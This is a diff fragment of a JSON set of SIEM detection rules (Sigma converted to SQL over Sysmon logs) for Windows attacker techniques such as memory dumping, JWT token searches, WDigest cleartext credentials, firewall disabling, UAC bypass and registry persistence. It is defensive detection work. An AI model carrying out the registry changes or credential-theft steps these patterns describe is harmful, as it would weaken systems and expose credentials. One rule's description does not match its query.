"Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". 
They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1112" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND 
(TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Use of Squirrel.exe", - "id": 
"45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE 
'%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and 
CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of Setres" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" + 
"SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. 
This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 
'%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", - "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. 
This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. 
Anhaus, oscd.community", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1070" + "attack.t1112" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb 
Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", - "status": "test", - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook 
Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": "435e10e4-992a-4281-96f3-38b11106adde", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - 
"attack.t1033" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", - "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], 
